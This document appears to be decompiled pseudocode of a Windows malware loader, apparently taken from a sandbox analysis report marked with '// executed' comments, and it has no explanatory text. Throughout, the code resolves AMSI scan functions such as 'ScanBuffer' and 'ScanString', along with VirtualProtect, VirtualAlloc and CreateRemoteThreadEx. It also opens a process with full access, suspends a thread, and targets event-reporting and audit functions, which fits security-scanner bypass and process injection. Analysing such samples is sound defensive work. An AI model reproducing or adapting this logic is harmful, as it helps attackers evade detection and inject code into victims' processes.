                                                                                                							Sleep(0x1f4); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x894, E02174D64( *((intOrPtr*)(_t2298 - 0x898))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x894)));
                                                                                                							_t1861 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x8a0, _t1861, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x89c, E02174D64( *((intOrPtr*)(_t2298 - 0x8a0))));
                                                                                                							_pop(_t2213); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x89c)), _t1809, _t2213, _t2297); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x8a4, E02174D64( *((intOrPtr*)(_t2298 - 0x8a8))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x8a4)));
                                                                                                							_t1862 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x8b0, _t1862, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x8ac, E02174D64( *((intOrPtr*)(_t2298 - 0x8b0))));
                                                                                                							_pop(_t2218); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x8ac)), _t1809, _t2218, _t2297);
                                                                                                							_t1554 =  *0x2194b34; // 0x3dfa858
                                                                                                							E02174A98(_t2298 - 0x8b4, E02174D64(_t1554));
                                                                                                							E021857D0( *((intOrPtr*)(_t2298 - 0x8b4)), _t1809, 0x2194b90, _t2296, _t2297, _t2307); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x8b8, E02174D64( *((intOrPtr*)(_t2298 - 0x8bc))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x8b8)));
                                                                                                							_t1863 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x8c4, _t1863, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x8c0, E02174D64( *((intOrPtr*)(_t2298 - 0x8c4))));
                                                                                                							_pop(_t2225); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x8c0)), _t1809, _t2225, _t2297); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x8c8, E02174D64( *((intOrPtr*)(_t2298 - 0x8cc))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x8c8)));
                                                                                                							_t1864 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x8d4, _t1864, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x8d0, E02174D64( *((intOrPtr*)(_t2298 - 0x8d4))));
                                                                                                							_pop(_t2230); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x8d0)), _t1809, _t2230, _t2297);
                                                                                                							_t1588 =  *0x2194b90; // 0xdf8
                                                                                                							 *0x2194b94 = OpenProcess(0x1f0fff, 0, _t1588);
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x8d8, E02174D64( *((intOrPtr*)(_t2298 - 0x8dc))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x8d8)));
                                                                                                							_t1865 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x8e4, _t1865, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x8e0, E02174D64( *((intOrPtr*)(_t2298 - 0x8e4))));
                                                                                                							_pop(_t2235); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x8e0)), _t1809, _t2235, _t2297); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x8e8, E02174D64( *((intOrPtr*)(_t2298 - 0x8ec))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x8e8)));
                                                                                                							_t1866 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x8f4, _t1866, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x8f0, E02174D64( *((intOrPtr*)(_t2298 - 0x8f4))));
                                                                                                							_pop(_t2240); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x8f0)), _t1809, _t2240, _t2297);
                                                                                                							_t1618 =  *0x2194b94; // 0x850
                                                                                                							NtSuspendThread(_t1618); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x8f8, E02174D64( *((intOrPtr*)(_t2298 - 0x8fc))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x8f8)));
                                                                                                							_t1867 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x904, _t1867, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x900, E02174D64( *((intOrPtr*)(_t2298 - 0x904))));
                                                                                                							_pop(_t2245); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x900)), _t1809, _t2245, _t2297); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x908, E02174D64( *((intOrPtr*)(_t2298 - 0x90c))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x908)));
                                                                                                							_t1868 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x914, _t1868, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x910, E02174D64( *((intOrPtr*)(_t2298 - 0x914))));
                                                                                                							_pop(_t2250); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x910)), _t1809, _t2250, _t2297); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x918, E02174D64( *((intOrPtr*)(_t2298 - 0x91c))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x918)));
                                                                                                							_t1869 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x924, _t1869, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x920, E02174D64( *((intOrPtr*)(_t2298 - 0x924))));
                                                                                                							_pop(_t2255); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x920)), _t1809, _t2255, _t2297); // executed
                                                                                                							_t1663 = E0217304C(0x38c);
                                                                                                							_push(_t1663);
                                                                                                							L021858FC();
                                                                                                							_t2308 = _t1663;
                                                                                                							if(_t2308 == 0) {
                                                                                                								_push(0x218e77c);
                                                                                                								_push( *0x2194bb0);
                                                                                                								_push("ScanBuffer");
                                                                                                								E02174C24();
                                                                                                								E02174A98(_t2298 - 0x928, E02174D64( *((intOrPtr*)(_t2298 - 0x92c))));
                                                                                                								_push( *((intOrPtr*)(_t2298 - 0x928)));
                                                                                                								_t1870 =  *0x2194bb0; // 0x3e01b38
                                                                                                								E02174BB0(_t2298 - 0x934, _t1870, 0x218e77c);
                                                                                                								E02174A98(_t2298 - 0x930, E02174D64( *((intOrPtr*)(_t2298 - 0x934))));
                                                                                                								_pop(_t2260); // executed
                                                                                                								E02183690( *((intOrPtr*)(_t2298 - 0x930)), _t1809, _t2260, _t2297); // executed
                                                                                                							} else {
                                                                                                								E021748F4(0x2194bb8, "5E5CDDEE");
                                                                                                							}
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x938, E02174D64( *((intOrPtr*)(_t2298 - 0x93c))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x938)));
                                                                                                							_t1871 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x944, _t1871, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x940, E02174D64( *((intOrPtr*)(_t2298 - 0x944))));
                                                                                                							_pop(_t2265); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x940)), _t1809, _t2265, _t2297); // executed
                                                                                                							E02174DBC(0x2194b78);
                                                                                                							_t1694 =  *0x2194b94; // 0x850, executed
                                                                                                							E0218779C(_t1694, _t1809, _t2296, _t2297); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x948, E02174D64( *((intOrPtr*)(_t2298 - 0x94c))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x948)));
                                                                                                							_t1873 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x954, _t1873, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x950, E02174D64( *((intOrPtr*)(_t2298 - 0x954))));
                                                                                                							_pop(_t2271); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x950)), _t1809, _t2271, _t2297);
                                                                                                							_t1710 =  *0x2194b94; // 0x850
                                                                                                							_push(_t1710);
                                                                                                							L02188604();
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x958, E02174D64( *((intOrPtr*)(_t2298 - 0x95c))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x958)));
                                                                                                							_t1874 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x964, _t1874, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x960, E02174D64( *((intOrPtr*)(_t2298 - 0x964))));
                                                                                                							_pop(_t2276); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x960)), _t1809, _t2276, _t2297); // executed
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x968, E02174D64( *((intOrPtr*)(_t2298 - 0x96c))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x968)));
                                                                                                				_t1839 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x974, _t1839, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x970, E02174D64( *((intOrPtr*)(_t2298 - 0x974))));
                                                                                                				_pop(_t2005); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x970)), _t1809, _t2005, _t2297); // executed
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanString");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x978, E02174D64( *((intOrPtr*)(_t2298 - 0x97c))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x978)));
                                                                                                				_t1840 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x984, _t1840, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x980, E02174D64( *((intOrPtr*)(_t2298 - 0x984))));
                                                                                                				_pop(_t2010); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x980)), _t1809, _t2010, _t2297);
                                                                                                				_t979 =  *0x2194bc0; // 0x0
                                                                                                				E02174CB0(_t979, 0x218e8cc);
                                                                                                				if(_t2308 == 0) {
                                                                                                					_t1460 =  *0x2194bc4; // 0x3e01b48
                                                                                                					E02174CB0(_t1460, 0x218e8cc);
                                                                                                					if(_t2308 != 0) {
                                                                                                						_t1462 =  *0x2194bc8; // 0x0
                                                                                                						E02174CB0(_t1462, 0x218e8cc);
                                                                                                						if(_t2308 != 0) {
                                                                                                							_t1465 = E0217304C(0x38c);
                                                                                                							_push(_t1465);
                                                                                                							L021858FC();
                                                                                                							if(_t1465 == 0) {
                                                                                                								_push(0x218e77c);
                                                                                                								_push( *0x2194bb0);
                                                                                                								_push("ScanBuffer");
                                                                                                								E02174C24();
                                                                                                								E02174A98(_t2298 - 0x988, E02174D64( *((intOrPtr*)(_t2298 - 0x98c))));
                                                                                                								_push( *((intOrPtr*)(_t2298 - 0x988)));
                                                                                                								_t1857 =  *0x2194bb0; // 0x3e01b38
                                                                                                								E02174BB0(_t2298 - 0x994, _t1857, 0x218e77c);
                                                                                                								E02174A98(_t2298 - 0x990, E02174D64( *((intOrPtr*)(_t2298 - 0x994))));
                                                                                                								_pop(_t2192);
                                                                                                								E02183690( *((intOrPtr*)(_t2298 - 0x990)), _t1809, _t2192, _t2297);
                                                                                                							} else {
                                                                                                								E021748F4(0x2194bb8, "5E5CDDEE");
                                                                                                							}
                                                                                                							E02172FC4(0, _t2298 - 0x998);
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x998)));
                                                                                                							_t1484 = E02174DBC(0x2194b78);
                                                                                                							_pop(_t1485);
                                                                                                							E02183990(_t1485, _t1809, _t1484, _t2297, _t2314);
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanString");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x99c, E02174D64( *((intOrPtr*)(_t2298 - 0x9a0))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x99c)));
                                                                                                				_t1841 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x9a8, _t1841, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x9a4, E02174D64( *((intOrPtr*)(_t2298 - 0x9a8))));
                                                                                                				_pop(_t2016); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x9a4)), _t1809, _t2016, _t2297); // executed
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x9ac, E02174D64( *((intOrPtr*)(_t2298 - 0x9b0))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x9ac)));
                                                                                                				_t1842 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x9b8, _t1842, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x9b4, E02174D64( *((intOrPtr*)(_t2298 - 0x9b8))));
                                                                                                				_pop(_t2021); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x9b4)), _t1809, _t2021, _t2297);
                                                                                                				_t1009 =  *0x2194bc8; // 0x0
                                                                                                				E02174CB0(_t1009, 0x218e8cc);
                                                                                                				if(0 == 0) {
                                                                                                					_t1435 =  *0x2194bc0; // 0x0
                                                                                                					E02174CB0(_t1435, 0x218e8cc);
                                                                                                					if(0 != 0) {
                                                                                                						_t1437 =  *0x2194bc4; // 0x3e01b48
                                                                                                						E02174CB0(_t1437, 0x218e8cc);
                                                                                                						if(0 != 0) {
                                                                                                							_t1440 = E0217304C(0x38c);
                                                                                                							_push(_t1440);
                                                                                                							L021858FC();
                                                                                                							if(_t1440 == 0) {
                                                                                                								_push(0x218e77c);
                                                                                                								_push( *0x2194bb0);
                                                                                                								_push("ScanBuffer");
                                                                                                								E02174C24();
                                                                                                								E02174A98(_t2298 - 0x9bc, E02174D64( *((intOrPtr*)(_t2298 - 0x9c0))));
                                                                                                								_push( *((intOrPtr*)(_t2298 - 0x9bc)));
                                                                                                								_t1856 =  *0x2194bb0; // 0x3e01b38
                                                                                                								E02174BB0(_t2298 - 0x9c8, _t1856, 0x218e77c);
                                                                                                								E02174A98(_t2298 - 0x9c4, E02174D64( *((intOrPtr*)(_t2298 - 0x9c8))));
                                                                                                								_pop(_t2184);
                                                                                                								E02183690( *((intOrPtr*)(_t2298 - 0x9c4)), _t1809, _t2184, _t2297);
                                                                                                							} else {
                                                                                                								E021748F4(0x2194bb8, "5E5CDDEE");
                                                                                                							}
                                                                                                							E021848A0(E02174DBC(0x2194b78), _t1809, _t2296, _t2297, _t2314);
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x9cc, E02174D64( *((intOrPtr*)(_t2298 - 0x9d0))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x9cc)));
                                                                                                				_t1843 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x9d8, _t1843, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x9d4, E02174D64( *((intOrPtr*)(_t2298 - 0x9d8))));
                                                                                                				_pop(_t2027); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x9d4)), _t1809, _t2027, _t2297); // executed
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("Initialize");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x9dc, E02174D64( *((intOrPtr*)(_t2298 - 0x9e0))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x9dc)));
                                                                                                				_t1844 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x9e8, _t1844, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x9e4, E02174D64( *((intOrPtr*)(_t2298 - 0x9e8))));
                                                                                                				_pop(_t2032); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x9e4)), _t1809, _t2032, _t2297); // executed
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanString");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x9ec, E02174D64( *((intOrPtr*)(_t2298 - 0x9f0))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x9ec)));
                                                                                                				_t1845 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x9f8, _t1845, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x9f4, E02174D64( *((intOrPtr*)(_t2298 - 0x9f8))));
                                                                                                				_pop(_t2037); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x9f4)), _t1809, _t2037, _t2297); // executed
                                                                                                				E02174A98(_t2298 - 0x9fc, "VirtualProtect");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x9fc)));
                                                                                                				E02174A98(_t2298 - 0xa00, "kernel32");
                                                                                                				_pop(_t2040);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa00)), _t1809, _t2040, _t2297);
                                                                                                				E02174A98(_t2298 - 0xa04, "VirtualAlloc");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa04)));
                                                                                                				E02174A98(_t2298 - 0xa08, "kernel32");
                                                                                                				_pop(_t2043);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa08)), _t1809, _t2043, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0xa0c, E02174D64( *((intOrPtr*)(_t2298 - 0xa10))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa0c)));
                                                                                                				_t1846 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0xa18, _t1846, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0xa14, E02174D64( *((intOrPtr*)(_t2298 - 0xa18))));
                                                                                                				_pop(_t2048); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa14)), _t1809, _t2048, _t2297); // executed
                                                                                                				E02174A98(_t2298 - 0xa1c, "VirtualProtect");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa1c)));
                                                                                                				E02174A98(_t2298 - 0xa20, "KernelBase");
                                                                                                				_pop(_t2051);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa20)), _t1809, _t2051, _t2297);
                                                                                                				E02174A98(_t2298 - 0xa24, "VirtualAlloc");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa24)));
                                                                                                				E02174A98(_t2298 - 0xa28, "KernelBase");
                                                                                                				_pop(_t2054);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa28)), _t1809, _t2054, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0xa2c, E02174D64( *((intOrPtr*)(_t2298 - 0xa30))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa2c)));
                                                                                                				_t1847 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0xa38, _t1847, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0xa34, E02174D64( *((intOrPtr*)(_t2298 - 0xa38))));
                                                                                                				_pop(_t2059); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa34)), _t1809, _t2059, _t2297); // executed
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("UacInitialize");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0xa3c, E02174D64( *((intOrPtr*)(_t2298 - 0xa40))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa3c)));
                                                                                                				_t1848 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0xa48, _t1848, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0xa44, E02174D64( *((intOrPtr*)(_t2298 - 0xa48))));
                                                                                                				_pop(_t2064); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa44)), _t1809, _t2064, _t2297); // executed
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("UacScan");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0xa4c, E02174D64( *((intOrPtr*)(_t2298 - 0xa50))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa4c)));
                                                                                                				_t1849 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0xa58, _t1849, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0xa54, E02174D64( *((intOrPtr*)(_t2298 - 0xa58))));
                                                                                                				_pop(_t2069); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa54)), _t1809, _t2069, _t2297); // executed
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanString");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0xa5c, E02174D64( *((intOrPtr*)(_t2298 - 0xa60))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa5c)));
                                                                                                				_t1850 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0xa68, _t1850, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0xa64, E02174D64( *((intOrPtr*)(_t2298 - 0xa68))));
                                                                                                				_pop(_t2074); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa64)), _t1809, _t2074, _t2297); // executed
                                                                                                				if(E0217304C(0x38c) != 0xc) {
                                                                                                					E021748F4(0x2194bb8, 0x218ea48);
                                                                                                				} else {
                                                                                                					E021748F4(0x2194bb8, "5E5CDDEE");
                                                                                                				}
                                                                                                				E02174A98(_t2298 - 0xa6c, "CreateRemoteThreadEx ");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa6c)));
                                                                                                				E02174A98(_t2298 - 0xa70, "kernelbase");
                                                                                                				_pop(_t2078);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa70)), _t1809, _t2078, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("UacScan");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0xa74, E02174D64( *((intOrPtr*)(_t2298 - 0xa78))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa74)));
                                                                                                				_t1851 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0xa80, _t1851, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0xa7c, E02174D64( *((intOrPtr*)(_t2298 - 0xa80))));
                                                                                                				_pop(_t2083); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa7c)), _t1809, _t2083, _t2297); // executed
                                                                                                				E02174A98(_t2298 - 0xa84, "ReportEventA");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa84)));
                                                                                                				E02174A98(_t2298 - 0xa88, "advapi32");
                                                                                                				_pop(_t2086);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa88)), _t1809, _t2086, _t2297);
                                                                                                				E02174A98(_t2298 - 0xa8c, "SetEncryptedFileMetadata");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa8c)));
                                                                                                				E02174A98(_t2298 - 0xa90, "advapi32");
                                                                                                				_pop(_t2089);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa90)), _t1809, _t2089, _t2297);
                                                                                                				E02174A98(_t2298 - 0xa94, "ReportEventW");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa94)));
                                                                                                				E02174A98(_t2298 - 0xa98, "advapi32");
                                                                                                				_pop(_t2092);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xa98)), _t1809, _t2092, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanString");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0xa9c, E02174D64( *((intOrPtr*)(_t2298 - 0xaa0))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xa9c)));
                                                                                                				_t1852 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0xaa8, _t1852, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0xaa4, E02174D64( *((intOrPtr*)(_t2298 - 0xaa8))));
                                                                                                				_pop(_t2097); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xaa4)), _t1809, _t2097, _t2297); // executed
                                                                                                				E02174A98(_t2298 - 0xaac, "LdrGetDllHandle");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xaac)));
                                                                                                				_t1214 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xab0, E02174D64(_t1214));
                                                                                                				_pop(_t2100);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xab0)), _t1809, _t2100, _t2297);
                                                                                                				E02174A98(_t2298 - 0xab4, "NtPrivilegedServiceAuditAlarm");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xab4)));
                                                                                                				_t1223 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xab8, E02174D64(_t1223));
                                                                                                				_pop(_t2103);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xab8)), _t1809, _t2103, _t2297);
                                                                                                				E02174A98(_t2298 - 0xabc, "LdrQueryProcessModuleInformation");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xabc)));
                                                                                                				_t1232 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xac0, E02174D64(_t1232));
                                                                                                				_pop(_t2106);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xac0)), _t1809, _t2106, _t2297);
                                                                                                				E02174A98(_t2298 - 0xac4, "LdrLoadDll");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xac4)));
                                                                                                				_t1241 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xac8, E02174D64(_t1241));
                                                                                                				_pop(_t2109);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xac8)), _t1809, _t2109, _t2297);
                                                                                                				E02174A98(_t2298 - 0xacc, "NtOpenObjectAuditAlarm");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xacc)));
                                                                                                				_t1250 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xad0, E02174D64(_t1250));
                                                                                                				_pop(_t2112);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xad0)), _t1809, _t2112, _t2297);
                                                                                                				E02174A98(_t2298 - 0xad4, "NtPrivilegeObjectAuditAlarm");
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0xad4)));
                                                                                                				_t1259 =  *0x2194bb8; // 0x3e09b08
                                                                                                				E02174A98(_t2298 - 0xad8, E02174D64(_t1259));
                                                                                                				_pop(_t2115);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0xad8)), _t1809, _t2115, _t2297);
                                                                                                				E02174A98(_t2298 - 0xadc, "NtAccessCheckAndAuditAlarm");
